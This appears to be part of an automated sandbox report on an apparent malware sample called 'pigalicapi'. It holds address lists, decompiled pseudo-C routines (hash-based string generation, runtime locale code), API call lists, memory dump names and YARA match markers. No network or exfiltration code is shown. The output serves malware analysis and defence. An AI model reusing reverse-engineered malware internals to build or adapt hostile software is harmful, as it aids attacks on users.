                                                                                                                                                                                                                                                                            0x00c7b849
                                                                                                                                                                                                                                                                            0x00c7b84f
                                                                                                                                                                                                                                                                            0x00c7b850
                                                                                                                                                                                                                                                                            0x00c7b853
                                                                                                                                                                                                                                                                            0x00c7b8a6
                                                                                                                                                                                                                                                                            0x00c7b855
                                                                                                                                                                                                                                                                            0x00c7b855
                                                                                                                                                                                                                                                                            0x00c7b859
                                                                                                                                                                                                                                                                            0x00c7b85c
                                                                                                                                                                                                                                                                            0x00c7b85e
                                                                                                                                                                                                                                                                            0x00c7b85e
                                                                                                                                                                                                                                                                            0x00c7b861
                                                                                                                                                                                                                                                                            0x00c7b863
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b865
                                                                                                                                                                                                                                                                            0x00c7b868
                                                                                                                                                                                                                                                                            0x00c7b873
                                                                                                                                                                                                                                                                            0x00c7b873
                                                                                                                                                                                                                                                                            0x00c7b875
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b86d
                                                                                                                                                                                                                                                                            0x00c7b872
                                                                                                                                                                                                                                                                            0x00c7b872
                                                                                                                                                                                                                                                                            0x00c7b872
                                                                                                                                                                                                                                                                            0x00c7b877
                                                                                                                                                                                                                                                                            0x00c7b87a
                                                                                                                                                                                                                                                                            0x00c7b87d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b87d
                                                                                                                                                                                                                                                                            0x00c7b85e
                                                                                                                                                                                                                                                                            0x00c7b87f
                                                                                                                                                                                                                                                                            0x00c7b87f
                                                                                                                                                                                                                                                                            0x00c7b882
                                                                                                                                                                                                                                                                            0x00c7b887
                                                                                                                                                                                                                                                                            0x00c7b887
                                                                                                                                                                                                                                                                            0x00c7b88a
                                                                                                                                                                                                                                                                            0x00c7b88b
                                                                                                                                                                                                                                                                            0x00c7b88b
                                                                                                                                                                                                                                                                            0x00c7b88b
                                                                                                                                                                                                                                                                            0x00c7b89b
                                                                                                                                                                                                                                                                            0x00c7b8a1
                                                                                                                                                                                                                                                                            0x00c7b8a1
                                                                                                                                                                                                                                                                            0x00c7b8ab
                                                                                                                                                                                                                                                                            0x00c7b8ae
                                                                                                                                                                                                                                                                            0x00c7b8af
                                                                                                                                                                                                                                                                            0x00c7b8b0
                                                                                                                                                                                                                                                                            0x00c7b974
                                                                                                                                                                                                                                                                            0x00c7b975
                                                                                                                                                                                                                                                                            0x00c7b97a
                                                                                                                                                                                                                                                                            0x00c7b97b
                                                                                                                                                                                                                                                                            0x00c7b97b
                                                                                                                                                                                                                                                                            0x00c7b82c
                                                                                                                                                                                                                                                                            0x00c7b819
                                                                                                                                                                                                                                                                            0x00c7b807
                                                                                                                                                                                                                                                                            0x00c7b7fb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b97d
                                                                                                                                                                                                                                                                            0x00c7b8db
                                                                                                                                                                                                                                                                            0x00c7b8e3
                                                                                                                                                                                                                                                                            0x00c7b8e3
                                                                                                                                                                                                                                                                            0x00c7b8e7
                                                                                                                                                                                                                                                                            0x00c7b8ea
                                                                                                                                                                                                                                                                            0x00c7b8f0
                                                                                                                                                                                                                                                                            0x00c7b8f3
                                                                                                                                                                                                                                                                            0x00c7b8f3
                                                                                                                                                                                                                                                                            0x00c7b8f6
                                                                                                                                                                                                                                                                            0x00c7b8f8
                                                                                                                                                                                                                                                                            0x00c7b8fa
                                                                                                                                                                                                                                                                            0x00c7b8fa
                                                                                                                                                                                                                                                                            0x00c7b8fd
                                                                                                                                                                                                                                                                            0x00c7b8ff
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b901
                                                                                                                                                                                                                                                                            0x00c7b904
                                                                                                                                                                                                                                                                            0x00c7b920
                                                                                                                                                                                                                                                                            0x00c7b920
                                                                                                                                                                                                                                                                            0x00c7b922
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b909
                                                                                                                                                                                                                                                                            0x00c7b90f
                                                                                                                                                                                                                                                                            0x00c7b911
                                                                                                                                                                                                                                                                            0x00c7b917
                                                                                                                                                                                                                                                                            0x00c7b91b
                                                                                                                                                                                                                                                                            0x00c7b91b
                                                                                                                                                                                                                                                                            0x00c7b91c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b91c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b90f
                                                                                                                                                                                                                                                                            0x00c7b924
                                                                                                                                                                                                                                                                            0x00c7b927
                                                                                                                                                                                                                                                                            0x00c7b92a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b92a
                                                                                                                                                                                                                                                                            0x00c7b92c
                                                                                                                                                                                                                                                                            0x00c7b92c
                                                                                                                                                                                                                                                                            0x00c7b92f
                                                                                                                                                                                                                                                                            0x00c7b930
                                                                                                                                                                                                                                                                            0x00c7b933
                                                                                                                                                                                                                                                                            0x00c7b936
                                                                                                                                                                                                                                                                            0x00c7b936
                                                                                                                                                                                                                                                                            0x00c7b93c
                                                                                                                                                                                                                                                                            0x00c7b93f
                                                                                                                                                                                                                                                                            0x00c7b94e
                                                                                                                                                                                                                                                                            0x00c7b957
                                                                                                                                                                                                                                                                            0x00c7b95c
                                                                                                                                                                                                                                                                            0x00c7b962
                                                                                                                                                                                                                                                                            0x00c7b963
                                                                                                                                                                                                                                                                            0x00c7b963
                                                                                                                                                                                                                                                                            0x00c7b966
                                                                                                                                                                                                                                                                            0x00c7b969
                                                                                                                                                                                                                                                                            0x00c7b96c
                                                                                                                                                                                                                                                                            0x00c7b96f
                                                                                                                                                                                                                                                                            0x00c7b96f
                                                                                                                                                                                                                                                                            0x00c7b96f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b7c3
                                                                                                                                                                                                                                                                            0x00c7b7c4
                                                                                                                                                                                                                                                                            0x00c7b7ca
                                                                                                                                                                                                                                                                            0x00c7b97e
                                                                                                                                                                                                                                                                            0x00c7b98d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7B370: GetOEMCP.KERNEL32(00000000), ref: 00C7B39B
                                                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C7B63E,?,00000000), ref: 00C7B811
                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00C7B63E,?,?,?,00C7B63E,?,00000000), ref: 00C7B824
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 546120528-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0836150fe150da31ec8f86213153bb86d21e544d7cb4a6543a2999a8acc56eef
                                                                                                                                                                                                                                                                            • Instruction ID: 62823ab633f8dee2c01bf34e57d2518aaf591fcaf8d043a3475867e4c9a5ef67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0836150fe150da31ec8f86213153bb86d21e544d7cb4a6543a2999a8acc56eef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE5134709002059EDB218F76C8817BABBF9AF41310F14C06ED5AE8B291D7359E42CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01179400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v91;
                                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                                            				char _v220;
                                                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                            					_t56 = E01177B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                            					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                            					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                            						E01177D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                            						_t59 = E01178BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                            						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                            						_v40 = _t59;
                                                                                                                                                                                                                                                                            						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                            							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v220;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                            						E01179650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                            						E01177D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                            						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                            						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                            						_v91 = 0;
                                                                                                                                                                                                                                                                            						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                            						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                            						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x01179409
                                                                                                                                                                                                                                                                            0x01179414
                                                                                                                                                                                                                                                                            0x0117943d
                                                                                                                                                                                                                                                                            0x01179442
                                                                                                                                                                                                                                                                            0x01179451
                                                                                                                                                                                                                                                                            0x01179454
                                                                                                                                                                                                                                                                            0x01179466
                                                                                                                                                                                                                                                                            0x01179480
                                                                                                                                                                                                                                                                            0x0117949a
                                                                                                                                                                                                                                                                            0x0117949f
                                                                                                                                                                                                                                                                            0x011794a2
                                                                                                                                                                                                                                                                            0x011794a9
                                                                                                                                                                                                                                                                            0x011794bf
                                                                                                                                                                                                                                                                            0x011794ab
                                                                                                                                                                                                                                                                            0x011794b1
                                                                                                                                                                                                                                                                            0x011794b1
                                                                                                                                                                                                                                                                            0x011794d1
                                                                                                                                                                                                                                                                            0x011794ed
                                                                                                                                                                                                                                                                            0x011794fd
                                                                                                                                                                                                                                                                            0x01179502
                                                                                                                                                                                                                                                                            0x01179513
                                                                                                                                                                                                                                                                            0x01179519
                                                                                                                                                                                                                                                                            0x01179521
                                                                                                                                                                                                                                                                            0x01179533
                                                                                                                                                                                                                                                                            0x0117953c
                                                                                                                                                                                                                                                                            0x01179545
                                                                                                                                                                                                                                                                            0x01179460
                                                                                                                                                                                                                                                                            0x01179463
                                                                                                                                                                                                                                                                            0x01179463
                                                                                                                                                                                                                                                                            0x01179466
                                                                                                                                                                                                                                                                            0x01179553

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: GetLastError.KERNEL32 ref: 01178C09
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178C38
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01178C59
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 01178C71
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 01178C99
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 01178CC1
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 01178CD5
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178CE1
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 01179513
                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 01179521
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                            • Opcode ID: ab8cd26d0caf3ae43202d89edaf43ca99f25c8c663126328ca1fb1322c133cee
                                                                                                                                                                                                                                                                            • Instruction ID: 6302e4d19fa31a29f4354959e4a09a85c3eeef149ad5a5d7f9380cacea858cf4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab8cd26d0caf3ae43202d89edaf43ca99f25c8c663126328ca1fb1322c133cee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90412BB1D0020DEBDB08DFD4C885BEEBBB5EF58318F10815AD515AB385E734A689CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E00C7B5DC(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                                                            				char _t31;
                                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                                            				char _t40;
                                                                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                                                                            				char _t45;
                                                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t81 = __eflags;
                                                                                                                                                                                                                                                                            				_v8 = E00C79E50(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                            				E00C7B6FB(__ebx, __ecx, __edx);
                                                                                                                                                                                                                                                                            				_t31 = E00C7B370(_t81, _a4);
                                                                                                                                                                                                                                                                            				_v16 = _t31;
                                                                                                                                                                                                                                                                            				_t57 =  *(_v8 + 0x48);
                                                                                                                                                                                                                                                                            				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                                                            				_t70 = E00C7BF3C(_t57, 0x220);
                                                                                                                                                                                                                                                                            				_t51 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                                                            				__eflags = _t70;
                                                                                                                                                                                                                                                                            				if(__eflags == 0) {
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					_t75 = _t51;
                                                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                                                            					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                                                                                                                                                                                                                            					_t36 = E00C7B79D(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                                                                                                                                                                                                                            					_t75 = _t36;
                                                                                                                                                                                                                                                                            					__eflags = _t75 - _t51;
                                                                                                                                                                                                                                                                            					if(_t75 != _t51) {
                                                                                                                                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                                                                                                                                            							E00C7A004();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                                                            						__eflags = _t51 == 1;
                                                                                                                                                                                                                                                                            						if(_t51 == 1) {
                                                                                                                                                                                                                                                                            							_t45 = _v8;
                                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xd0d8b0;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t45 + 0x48)) != 0xd0d8b0) {
                                                                                                                                                                                                                                                                            								E00C7A8FB( *((intOrPtr*)(_t45 + 0x48)));
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *_t70 = 1;
                                                                                                                                                                                                                                                                            						_t64 = _t70;
                                                                                                                                                                                                                                                                            						_t70 = 0;
                                                                                                                                                                                                                                                                            						 *(_v8 + 0x48) = _t64;
                                                                                                                                                                                                                                                                            						_t40 = _v8;
                                                                                                                                                                                                                                                                            						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                                                            						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            							__eflags =  *0xd0dad4 & 0x00000001;
                                                                                                                                                                                                                                                                            							if(( *0xd0dad4 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            								_v16 =  &_v8;
                                                                                                                                                                                                                                                                            								E00C7B246(5,  &_v16);
                                                                                                                                                                                                                                                                            								__eflags = _a8;
                                                                                                                                                                                                                                                                            								if(_a8 != 0) {
                                                                                                                                                                                                                                                                            									_t44 =  *0xd0dad0; // 0x12ee898
                                                                                                                                                                                                                                                                            									 *0xd0d59c = _t44;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t70);
                                                                                                                                                                                                                                                                            						return _t75;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(E00C79A46())) = 0x16;
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x00c7b5dc
                                                                                                                                                                                                                                                                            0x00c7b5e9
                                                                                                                                                                                                                                                                            0x00c7b5ec
                                                                                                                                                                                                                                                                            0x00c7b5f4
                                                                                                                                                                                                                                                                            0x00c7b5fd
                                                                                                                                                                                                                                                                            0x00c7b600
                                                                                                                                                                                                                                                                            0x00c7b606
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b608
                                                                                                                                                                                                                                                                            0x00c7b60c
                                                                                                                                                                                                                                                                            0x00c7b619
                                                                                                                                                                                                                                                                            0x00c7b61b
                                                                                                                                                                                                                                                                            0x00c7b61f
                                                                                                                                                                                                                                                                            0x00c7b621
                                                                                                                                                                                                                                                                            0x00c7b651
                                                                                                                                                                                                                                                                            0x00c7b651
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b623
                                                                                                                                                                                                                                                                            0x00c7b630
                                                                                                                                                                                                                                                                            0x00c7b636
                                                                                                                                                                                                                                                                            0x00c7b639
                                                                                                                                                                                                                                                                            0x00c7b63e
                                                                                                                                                                                                                                                                            0x00c7b642
                                                                                                                                                                                                                                                                            0x00c7b644
                                                                                                                                                                                                                                                                            0x00c7b663
                                                                                                                                                                                                                                                                            0x00c7b667
                                                                                                                                                                                                                                                                            0x00c7b669
                                                                                                                                                                                                                                                                            0x00c7b669
                                                                                                                                                                                                                                                                            0x00c7b674
                                                                                                                                                                                                                                                                            0x00c7b678
                                                                                                                                                                                                                                                                            0x00c7b679
                                                                                                                                                                                                                                                                            0x00c7b67b
                                                                                                                                                                                                                                                                            0x00c7b67e
                                                                                                                                                                                                                                                                            0x00c7b685
                                                                                                                                                                                                                                                                            0x00c7b68a
                                                                                                                                                                                                                                                                            0x00c7b68f
                                                                                                                                                                                                                                                                            0x00c7b685
                                                                                                                                                                                                                                                                            0x00c7b690
                                                                                                                                                                                                                                                                            0x00c7b696
                                                                                                                                                                                                                                                                            0x00c7b69b
                                                                                                                                                                                                                                                                            0x00c7b69d
                                                                                                                                                                                                                                                                            0x00c7b6a0
                                                                                                                                                                                                                                                                            0x00c7b6a3
                                                                                                                                                                                                                                                                            0x00c7b6aa
                                                                                                                                                                                                                                                                            0x00c7b6ac
                                                                                                                                                                                                                                                                            0x00c7b6b3
                                                                                                                                                                                                                                                                            0x00c7b6b8
                                                                                                                                                                                                                                                                            0x00c7b6c1
                                                                                                                                                                                                                                                                            0x00c7b6c6
                                                                                                                                                                                                                                                                            0x00c7b6cc
                                                                                                                                                                                                                                                                            0x00c7b6ce
                                                                                                                                                                                                                                                                            0x00c7b6d3
                                                                                                                                                                                                                                                                            0x00c7b6d3
                                                                                                                                                                                                                                                                            0x00c7b6cc
                                                                                                                                                                                                                                                                            0x00c7b6b3
                                                                                                                                                                                                                                                                            0x00c7b653
                                                                                                                                                                                                                                                                            0x00c7b654
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b646
                                                                                                                                                                                                                                                                            0x00c7b64b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b64b
                                                                                                                                                                                                                                                                            0x00c7b644

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C79E50: GetLastError.KERNEL32(?,?,00C760D1,?,?,?,00C74DA8,?), ref: 00C79E54
                                                                                                                                                                                                                                                                              • Part of subcall function 00C79E50: _free.LIBCMT ref: 00C79E87
                                                                                                                                                                                                                                                                              • Part of subcall function 00C79E50: SetLastError.KERNEL32(00000000,?), ref: 00C79EC8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C79E50: _abort.LIBCMT ref: 00C79ECE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7B6FB: _abort.LIBCMT ref: 00C7B72D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7B6FB: _free.LIBCMT ref: 00C7B761
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7B370: GetOEMCP.KERNEL32(00000000), ref: 00C7B39B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7B654
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7B68A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2991157371-0
                                                                                                                                                                                                                                                                            • Opcode ID: 87bc0b9da63a140cc921c5f0ea9b523ac3b643c98a06c77b2d12a07310f8b0c1
                                                                                                                                                                                                                                                                            • Instruction ID: 1b24c3d5bda9197e6bbeddb1a6b49ad93ed269e55e641f4f87658e433a8177ac
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87bc0b9da63a140cc921c5f0ea9b523ac3b643c98a06c77b2d12a07310f8b0c1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C631F931904208AFDB14EFA9D545B5DBBF5DF40320F25C09AF51C9B2A1DB725E41DB50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 01174C19
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C49
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C60
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 01174C77
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 011756F0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2825510553-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3cb43956d5b9c4b9dcfecfc4ff177494266f563d61f728d1ad1e0fb6e7f731c2
                                                                                                                                                                                                                                                                            • Instruction ID: c8a5e69699fae5729a0ae8866561d0e9e2f961d1bf0e503832192e797319dfe8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cb43956d5b9c4b9dcfecfc4ff177494266f563d61f728d1ad1e0fb6e7f731c2
